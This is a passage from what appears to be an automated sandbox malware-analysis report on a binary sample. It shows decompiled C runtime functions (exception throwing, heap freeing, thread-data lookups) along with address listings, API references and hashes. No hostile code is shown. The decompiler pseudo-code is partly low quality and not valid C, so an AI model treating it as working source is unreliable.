                    • Instruction Fuzzy Hash: 85F0E97060020466DB04B662EC16B5E3E589FC032CB14803FFD04751D2DB3C9945D96D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E00404194() {
                    				intOrPtr _v16;
                    				void* _v28;
                    				void* _v64;
                    				void* _v104;
                    				void* __esi;
                    				void* _t17;
                    				intOrPtr* _t19;
                    				void* _t20;
                    				void* _t21;
                    				intOrPtr* _t22;
                    				void* _t24;
                    
                    				_push(0x44);
                    				E00404CAA(E0040BA6C, _t17, _t20, _t21);
                    				E00403FBB(_t24 - 0x28, _t20, "invalid string position");
                    				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
                    				_t19 = _t24 - 0x50;
                    				E0040410D(_t19, _t24 - 0x28);
                    				E004044FB(_t24 - 0x50, 0x40dc7c);
                    				asm("int3");
                    				_push(_t24);
                    				_push(_t21);
                    				_push(_v16);
                    				_t22 = _t19;
                    				E00404025(_t19);
                    				 *_t22 = 0x40133c;
                    				return _t22;
                    			}














                    0x00404194
                    0x0040419b
                    0x004041a8
                    0x004041ad
                    0x004041b5
                    0x004041b8
                    0x004041c6
                    0x004041cb
                    0x004041ce
                    0x004041d1
                    0x004041d2
                    0x004041d5
                    0x004041d7
                    0x004041dc
                    0x004041e6

                    APIs
                    • __EH_prolog3.LIBCMT ref: 0040419B
                    • std::bad_exception::bad_exception.LIBCMT ref: 004041B8
                    • __CxxThrowException@8.LIBCMT ref: 004041C6
                      • Part of subcall function 004044FB: RaiseException.KERNEL32(?,?,004044FA,?,?,?,?,9@,004044FA,?,0040DAC0,0057A198,?,004039E2,?), ref: 0040453D
                      • Part of subcall function 00404025: __EH_prolog.LIBCMT ref: 0040402A
                      • Part of subcall function 00404025: std::exception::exception.LIBCMT ref: 0040403B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: ExceptionException@8H_prologH_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                    • String ID: 5A@$invalid string position
                    • API String ID: 255094582-3784145193
                    • Opcode ID: 7c60f25f8d0440b76b18487978f90ad4e52a6ac8384dc5be328e918e4f911517
                    • Instruction ID: 607e15567fa4394d7e1728ce67b10124f211bfbe59a1c0b2f7c869206f80b444
                    • Opcode Fuzzy Hash: 7c60f25f8d0440b76b18487978f90ad4e52a6ac8384dc5be328e918e4f911517
                    • Instruction Fuzzy Hash: F0F030B290021867D704EAD2D805ECEBB78EB54765F54103BF700765D1DBB99944C7AC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E00405B89(intOrPtr* _a4) {
                    				signed int _v8;
                    				void* __ebp;
                    				intOrPtr* _t15;
                    				intOrPtr* _t18;
                    				void* _t22;
                    				void* _t23;
                    				void* _t24;
                    				void* _t25;
                    
                    				_t30 =  *((intOrPtr*)( *_a4)) - 0xe0434f4d;
                    				if( *((intOrPtr*)( *_a4)) == 0xe0434f4d) {
                    					__eflags =  *((intOrPtr*)(E00406A5A(_t22, _t23, __eflags) + 0x90));
                    					if(__eflags > 0) {
                    						_t15 = E00406A5A(_t22, _t23, __eflags) + 0x90;
                    						 *_t15 =  *_t15 - 1;
                    						__eflags =  *_t15;
                    					}
                    					goto L9;
                    				} else {
                    					__eflags = __eax - 0xe06d7363;
                    					if(__eflags != 0) {
                    						L9:
                    						__eflags = 0;
                    						return 0;
                    					} else {
                    						 *(E00406A5A(__ebx, __edx, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
                    						_push(8);
                    						_push(0x40dce8);
                    						E00406E94(_t22, _t24, _t25);
                    						_t18 =  *((intOrPtr*)(E00406A5A(_t22, _t23, _t30) + 0x78));
                    						if(_t18 != 0) {
                    							_v8 = _v8 & 0x00000000;
                    							 *_t18();
                    							_v8 = 0xfffffffe;
                    						}
                    						return E00406ED9(E00406D7C(_t22, _t23, _t24, _t25));
                    					}
                    				}
                    			}











                    0x00405b95
                    0x00405b9a
                    0x00405bb9
                    0x00405bc0
                    0x00405bc7
                    0x00405bcc
                    0x00405bcc
                    0x00405bcc
                    0x00000000
                    0x00405b9c
                    0x00405b9c
                    0x00405ba1
                    0x00405bce
                    0x00405bce
                    0x00405bd1
                    0x00405ba3
                    0x00405ba8
                    0x0040494f
                    0x00404951
                    0x00404956
                    0x00404960
                    0x00404965
                    0x00404967
                    0x0040496b
                    0x00404976
                    0x00404976
                    0x00404987
                    0x00404987
                    0x00405ba1

                    APIs
                    • __getptd.LIBCMT ref: 00405BA3
                      • Part of subcall function 00406A5A: __getptd_noexit.LIBCMT ref: 00406A5D
                      • Part of subcall function 00406A5A: __amsg_exit.LIBCMT ref: 00406A6A
                    • __getptd.LIBCMT ref: 00405BB4
                    • __getptd.LIBCMT ref: 00405BC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: MOC$csm
                    • API String ID: 803148776-1389381023
                    • Opcode ID: ee9f28c399f4596c4d47a8939a460f410f000b5e59a68f6aac1da9382e076d26
                    • Instruction ID: 088ae7dc6b13c634807322a86cacde43e2a1134fa021847d7b137c037cf3fd9d
                    • Opcode Fuzzy Hash: ee9f28c399f4596c4d47a8939a460f410f000b5e59a68f6aac1da9382e076d26
                    • Instruction Fuzzy Hash: 42E01A312106048FD710FA69C446B2A36A6FB85318F1652B7E509EB3A2C77CF850994A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E0040983D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t15;
                    				LONG* _t21;
                    				long _t23;
                    				void* _t31;
                    				LONG* _t33;
                    				void* _t34;
                    				void* _t35;
                    
                    				_t35 = __eflags;
                    				_t29 = __edx;
                    				_t25 = __ebx;
                    				_push(0xc);
                    				_push(0x40e020);
                    				E00406E94(__ebx, __edi, __esi);
                    				_t31 = E00406A5A(__ebx, __edx, _t35);
                    				_t15 =  *0x42047c; // 0xfffffffe
                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                    					E004081FA(_t25, _t31, 0xd);
                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                    					_t33 =  *(_t31 + 0x68);
                    					 *(_t34 - 0x1c) = _t33;
                    					__eflags = _t33 -  *0x420248; // 0x881610
                    					if(__eflags != 0) {
                    						__eflags = _t33;
                    						if(_t33 != 0) {
                    							_t23 = InterlockedDecrement(_t33);
                    							__eflags = _t23;
                    							if(_t23 == 0) {
                    								__eflags = _t33 - 0x41fe20;
                    								if(__eflags != 0) {
                    									_push(_t33);
                    									E00404E94(_t25, _t31, _t33, __eflags);
                    								}
                    							}
                    						}
                    						_t21 =  *0x420248; // 0x881610
                    						 *(_t31 + 0x68) = _t21;
                    						_t33 =  *0x420248; // 0x881610
                    						 *(_t34 - 0x1c) = _t33;
                    						InterlockedIncrement(_t33);
                    					}
                    					 *(_t34 - 4) = 0xfffffffe;
                    					E004098D8();
                    				} else {
                    					_t33 =  *(_t31 + 0x68);
                    				}
                    				if(_t33 == 0) {
                    					E004070FC(_t29, 0x20);
                    				}
                    				return E00406ED9(_t33);
                    			}










                    0x0040983d
                    0x0040983d
                    0x0040983d
                    0x0040983d
                    0x0040983f
                    0x00409844
                    0x0040984e
                    0x00409850
                    0x00409858
                    0x00409879
                    0x0040987f
                    0x00409883
                    0x00409886
                    0x00409889
                    0x0040988f
                    0x00409891
                    0x00409893
                    0x00409896
                    0x0040989c
                    0x0040989e
                    0x004098a0
                    0x004098a6
                    0x004098a8
                    0x004098a9
                    0x004098ae
                    0x004098a6
                    0x0040989e
                    0x004098af
                    0x004098b4
                    0x004098b7
                    0x004098bd
                    0x004098c1
                    0x004098c1
                    0x004098c7
                    0x004098ce
                    0x00409860
                    0x00409860
                    0x00409860
                    0x00409865
                    0x00409869
                    0x0040986e
                    0x00409876

                    APIs
                    • __getptd.LIBCMT ref: 00409849
                      • Part of subcall function 00406A5A: __getptd_noexit.LIBCMT ref: 00406A5D
                      • Part of subcall function 00406A5A: __amsg_exit.LIBCMT ref: 00406A6A
                    • __amsg_exit.LIBCMT ref: 00409869
                    • __lock.LIBCMT ref: 00409879
                    • InterlockedDecrement.KERNEL32(?), ref: 00409896
                    • InterlockedIncrement.KERNEL32(00881610), ref: 004098C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                    • String ID:
                    • API String ID: 4271482742-0
                    • Opcode ID: 7a4b01069ac0e791db80349cc32a92b235009e9e6e672071b789ae931b0c6b02
                    • Instruction ID: d5f692d2632406425e7fa88da1b48326db9ae83c0cc23e1057f582249af43721
                    • Opcode Fuzzy Hash: 7a4b01069ac0e791db80349cc32a92b235009e9e6e672071b789ae931b0c6b02
                    • Instruction Fuzzy Hash: 71013932A107219BD720BB66980575EB7A0AF05724F05817BE505777E2CB3CAD82CBDD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E00404E94(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr* _t10;
                    				intOrPtr _t13;
                    				intOrPtr _t23;
                    				void* _t25;
                    
                    				_push(0xc);
                    				_push(0x40dd70);
                    				_t8 = E00406E94(__ebx, __edi, __esi);
                    				_t23 =  *((intOrPtr*)(_t25 + 8));
                    				if(_t23 == 0) {
                    					L9:
                    					return E00406ED9(_t8);
                    				}
                    				if( *0x57ac58 != 3) {
                    					_push(_t23);
                    					L7:
                    					if(HeapFree( *0x57a634, 0, ??) == 0) {
                    						_t10 = E004055B4();
                    						 *_t10 = E00405572(GetLastError());
                    					}
                    					goto L9;
                    				}
                    				E004081FA(__ebx, __edi, 4);
                    				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                    				_t13 = E0040822D(_t23);
                    				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                    				if(_t13 != 0) {
                    					_push(_t23);
                    					_push(_t13);
                    					E0040825D();
                    				}
                    				 *(_t25 - 4) = 0xfffffffe;
                    				_t8 = E00404EEA();
                    				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                    					goto L9;
                    				} else {
                    					_push( *((intOrPtr*)(_t25 + 8)));
                    					goto L7;
                    				}
                    			}







                    0x00404e94
                    0x00404e96
                    0x00404e9b
                    0x00404ea0
                    0x00404ea5
                    0x00404f1c
                    0x00404f21
                    0x00404f21
                    0x00404eae
                    0x00404ef3
                    0x00404ef4
                    0x00404f04
                    0x00404f06
                    0x00404f19
                    0x00404f1b
                    0x00000000
                    0x00404f04
                    0x00404eb2
                    0x00404eb8
                    0x00404ebd
                    0x00404ec3
                    0x00404ec8
                    0x00404eca
                    0x00404ecb
                    0x00404ecc
                    0x00404ed2
                    0x00404ed3
                    0x00404eda
                    0x00404ee3
                    0x00000000
                    0x00404ee5
                    0x00404ee5
                    0x00000000
                    0x00404ee5

                    APIs
                    • __lock.LIBCMT ref: 00404EB2
                      • Part of subcall function 004081FA: __mtinitlocknum.LIBCMT ref: 00408210
                      • Part of subcall function 004081FA: __amsg_exit.LIBCMT ref: 0040821C
                      • Part of subcall function 004081FA: EnterCriticalSection.KERNEL32(?,?,?,0040A78B,00000004,0040E0C0,0000000C,004091B9,?,?,00000000,00000000,00000000,?,00406A0C,00000001), ref: 00408224
                    • ___sbh_find_block.LIBCMT ref: 00404EBD
                    • ___sbh_free_block.LIBCMT ref: 00404ECC
                    • HeapFree.KERNEL32(00000000,?,0040DD70,0000000C,004081DB,00000000,0040DFA0,0000000C,00408215,?,?,?,0040A78B,00000004,0040E0C0,0000000C), ref: 00404EFC
                    • GetLastError.KERNEL32(?,0040A78B,00000004,0040E0C0,0000000C,004091B9,?,?,00000000,00000000,00000000,?,00406A0C,00000001,00000214), ref: 00404F0D
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                    • String ID:
                    • API String ID: 2714421763-0
                    • Opcode ID: 2013ba940d313ea34614954f8034e6e5243da2ea7a950902972affa3b42f616b
                    • Instruction ID: d1ded028c465c40576e6591e98055ed8ed7d3535dd24929ba185c550c2564aac
                    • Opcode Fuzzy Hash: 2013ba940d313ea34614954f8034e6e5243da2ea7a950902972affa3b42f616b
                    • Instruction Fuzzy Hash: DF01AC71841355E6DF206BB2EC06B5F7664AF50314F20007FF504761D1CF3C89409A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 19%
                    			E004061E7(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                    				void* __ebp;
                    				void* _t20;
                    				void* _t22;
                    				void* _t23;
                    				intOrPtr* _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t26 = __esi;
                    				_t25 = __edi;
                    				_t22 = __ebx;
                    				_t29 = _a20;
                    				if(_a20 != 0) {
                    					_push(_a20);
                    					_push(__ebx);
                    					_push(__esi);
                    					_push(_a4);
                    					E00406155(__ebx, __edi, __esi, _t29);
                    					_t27 = _t27 + 0x10;
                    				}
                    				_t30 = _a28;
                    				_push(_a4);
                    				if(_a28 != 0) {
                    					_push(_a28);
                    				} else {
                    					_push(_t26);
                    				}
                    				E00404580(_t23);
                    				_push( *_t25);
                    				_push(_a16);
                    				_push(_a12);
                    				_push(_t26);
                    				E00405BD2(_t22, _t25, _t26, _t30);
                    				_push(0x100);
                    				_push(_a24);
                    				_push(_a16);
                    				 *((intOrPtr*)(_t26 + 8)) =  *((intOrPtr*)(_t25 + 4)) + 1;
                    				_push(_a8);
                    				_push(_t26);
                    				_push(_a4);
                    				_t20 = E00405E3A( *((intOrPtr*)(_t22 + 0xc)));
                    				if(_t20 != 0) {
                    					E00404547(_t20, _t26);
                    					return _t20;
                    				}
                    				return _t20;
                    			}










                    0x004061e7
                    0x004061e7
                    0x004061e7
                    0x004061ec
                    0x004061f0
                    0x004061f2
                    0x004061f5
                    0x004061f6
                    0x004061f7
                    0x004061fa
                    0x004061ff
                    0x004061ff
                    0x00406202
                    0x00406206
                    0x00406209
                    0x0040620e
                    0x0040620b
                    0x0040620b
                    0x0040620b
                    0x00406211
                    0x00406216
                    0x00406218
                    0x0040621b
                    0x0040621e
                    0x0040621f
                    0x00406227
                    0x0040622c
                    0x00406230
                    0x00406233
                    0x00406236
                    0x0040623c
                    0x0040623d
                    0x00406240
                    0x0040624a
                    0x0040624e
                    0x00000000
                    0x0040624e
                    0x00406254

                    APIs
                    • ___BuildCatchObject.LIBCMT ref: 004061FA
                      • Part of subcall function 00406155: ___BuildCatchObjectHelper.LIBCMT ref: 0040618B
                    • _UnwindNestedFrames.LIBCMT ref: 00406211
                    • ___FrameUnwindToState.LIBCMT ref: 0040621F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                    • String ID: csm
                    • API String ID: 2163707966-1018135373
                    • Opcode ID: 26d346e03a40db835789a22d0e8c6be2908a1210ab3643219c2a302355f7339c
                    • Instruction ID: 63b3a2b4d35b384e587e2a1477fbb4ef3cb260e6671f1a1435f59bc2ed9a7f00
                    • Opcode Fuzzy Hash: 26d346e03a40db835789a22d0e8c6be2908a1210ab3643219c2a302355f7339c
                    • Instruction Fuzzy Hash: 00014B71000109BBDF126F51CC45EAB7F6AEF48358F01402AFE59251A1D73AD9B1DBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E00403FEC(void* __edi) {
                    				intOrPtr* _t26;
                    				intOrPtr _t30;
                    				intOrPtr* _t34;
                    				void* _t36;
                    
                    				E00404930(E0040BA36, _t36);
                    				E00403FBB(_t36 - 0x28, __edi, "vector<T> too long");
                    				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                    				_t26 = _t36 - 0x50;
                    				E00403F76(_t26, _t36 - 0x28);
                    				E004044FB(_t36 - 0x50, 0x40dba0);
                    				asm("int3");
                    				E00404930(E0040BA48, _t36);
                    				_push(_t26);
                    				_push(__edi);
                    				_t30 =  *((intOrPtr*)(_t36 + 8));
                    				_t34 = _t26;
                    				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
                    				E0040426A(_t26, _t30);
                    				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                    				_t31 = _t30 + 0xc;
                    				 *_t34 = 0x401300;
                    				E00403EF7(_t34 + 0xc, _t30 + 0xc, _t31);
                    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
                    				return _t34;
                    			}







                    0x00403ff1
                    0x00404001
                    0x00404006
                    0x0040400e
                    0x00404011
                    0x0040401f
                    0x00404024
                    0x0040402a
                    0x0040402f
                    0x00404031
                    0x00404032
                    0x00404035
                    0x00404038
                    0x0040403b
                    0x00404040
                    0x00404044
                    0x0040404b
                    0x00404051
                    0x0040405d
                    0x00404065

                    APIs
                    • __EH_prolog.LIBCMT ref: 00403FF1
                    • std::bad_exception::bad_exception.LIBCMT ref: 00404011
                    • __CxxThrowException@8.LIBCMT ref: 0040401F
                      • Part of subcall function 004044FB: RaiseException.KERNEL32(?,?,004044FA,?,?,?,?,9@,004044FA,?,0040DAC0,0057A198,?,004039E2,?), ref: 0040453D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: ExceptionException@8H_prologRaiseThrowstd::bad_exception::bad_exception
                    • String ID: vector<T> too long
                    • API String ID: 1606262581-3788999226
                    • Opcode ID: 23d040404656ac5d381abd0d0b7d0bad413092a48b3cb31ccf11021518d71602
                    • Instruction ID: 1d29dda6a968adb5d7e5ea7ed480521e30fed810e91d497e203154d6009b3c35
                    • Opcode Fuzzy Hash: 23d040404656ac5d381abd0d0b7d0bad413092a48b3cb31ccf11021518d71602
                    • Instruction Fuzzy Hash: 55D012F1D1410856C700FAF5C856ADDB73CAB14715F50403BB201B10D5DB7C66088678
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E004095A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t13;
                    				intOrPtr _t27;
                    				intOrPtr _t29;
                    				void* _t30;
                    				void* _t31;
                    
                    				_t31 = __eflags;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t22 = __ebx;
                    				_push(0xc);
                    				_push(0x40e000);
                    				E00406E94(__ebx, __edi, __esi);
                    				_t29 = E00406A5A(__ebx, __edx, _t31);
                    				_t13 =  *0x42047c; // 0xfffffffe
                    				if(( *(_t29 + 0x70) & _t13) == 0) {
                    					L6:
                    					E004081FA(_t22, _t26, 0xc);
                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                    					_t8 = _t29 + 0x6c; // 0x6c
                    					_t27 =  *0x41fe10; // 0x41fd38
                    					 *((intOrPtr*)(_t30 - 0x1c)) = E00409563(_t8, _t27);
                    					 *(_t30 - 4) = 0xfffffffe;
                    					E0040960B();
                    				} else {
                    					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                    					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                    						goto L6;
                    					} else {
                    						_t29 =  *((intOrPtr*)(E00406A5A(_t22, __edx, _t33) + 0x6c));
                    					}
                    				}
                    				if(_t29 == 0) {
                    					E004070FC(_t25, 0x20);
                    				}
                    				return E00406ED9(_t29);
                    			}








                    0x004095a1
                    0x004095a1
                    0x004095a1
                    0x004095a1
                    0x004095a1
                    0x004095a3
                    0x004095a8
                    0x004095b2
                    0x004095b4
                    0x004095bc
                    0x004095e0
                    0x004095e2
                    0x004095e8
                    0x004095ec
                    0x004095ef
                    0x004095fa
                    0x004095fd
                    0x00409604
                    0x004095be
                    0x004095be
                    0x004095c2
                    0x00000000
                    0x004095c4
                    0x004095c9
                    0x004095c9
                    0x004095c2
                    0x004095ce
                    0x004095d2
                    0x004095d7
                    0x004095df

                    APIs
                    • __getptd.LIBCMT ref: 004095AD
                      • Part of subcall function 00406A5A: __getptd_noexit.LIBCMT ref: 00406A5D
                      • Part of subcall function 00406A5A: __amsg_exit.LIBCMT ref: 00406A6A
                    • __getptd.LIBCMT ref: 004095C4
                    • __amsg_exit.LIBCMT ref: 004095D2
                    • __lock.LIBCMT ref: 004095E2
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                    • String ID:
                    • API String ID: 3521780317-0
                    • Opcode ID: a42a3ee6f32d1cdb8300804fc061515c9dcfb40dd5d43054b99106fa7cad4cef
                    • Instruction ID: 036da38fd2b0aedff4db4488427372200426c576a814986434c939e40ca0c7b3
                    • Opcode Fuzzy Hash: a42a3ee6f32d1cdb8300804fc061515c9dcfb40dd5d43054b99106fa7cad4cef
                    • Instruction Fuzzy Hash: 05F04932A04310EAD621FB77880274A32A0AF00729F11867FE5557B2D3CB7C9D12CA5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E00405F60(void* __ebx, void* __edi, intOrPtr* __esi) {
                    				intOrPtr _t17;
                    				void* _t26;
                    				intOrPtr* _t28;
                    				void* _t29;
                    				void* _t30;
                    
                    				_t28 = __esi;
                    				_t19 = __ebx;
                    				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                    				E0040487B(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
                    				 *((intOrPtr*)(E00406A5A(__ebx, _t26, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                    				_t17 = E00406A5A(_t19, _t26, _t30);
                    				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                    				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                    					_t17 =  *((intOrPtr*)(__esi + 0x14));
                    					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                    						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                    							_t17 = E00404854( *((intOrPtr*)(_t28 + 0x18)));
                    							_t38 = _t17;
                    							if(_t17 != 0) {
                    								_push( *((intOrPtr*)(_t29 + 0x10)));
                    								_push(_t28);
                    								return E00405CF8(_t38);
                    							}
                    						}
                    					}
                    				}
                    				return _t17;
                    			}








                    0x00405f60
                    0x00405f60
                    0x00405f63
                    0x00405f69
                    0x00405f77
                    0x00405f7d
                    0x00405f85
                    0x00405f91
                    0x00405f99
                    0x00405fa1
                    0x00405fb5
                    0x00405fc0
                    0x00405fc6
                    0x00405fc8
                    0x00405fca
                    0x00405fcd
                    0x00000000
                    0x00405fd4
                    0x00405fc8
                    0x00405fb5
                    0x00405fa1
                    0x00405fd5

                    APIs
                      • Part of subcall function 0040487B: __getptd.LIBCMT ref: 00404881
                      • Part of subcall function 0040487B: __getptd.LIBCMT ref: 00404891
                    • __getptd.LIBCMT ref: 00405F6F
                      • Part of subcall function 00406A5A: __getptd_noexit.LIBCMT ref: 00406A5D
                      • Part of subcall function 00406A5A: __amsg_exit.LIBCMT ref: 00406A6A
                    • __getptd.LIBCMT ref: 00405F7D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
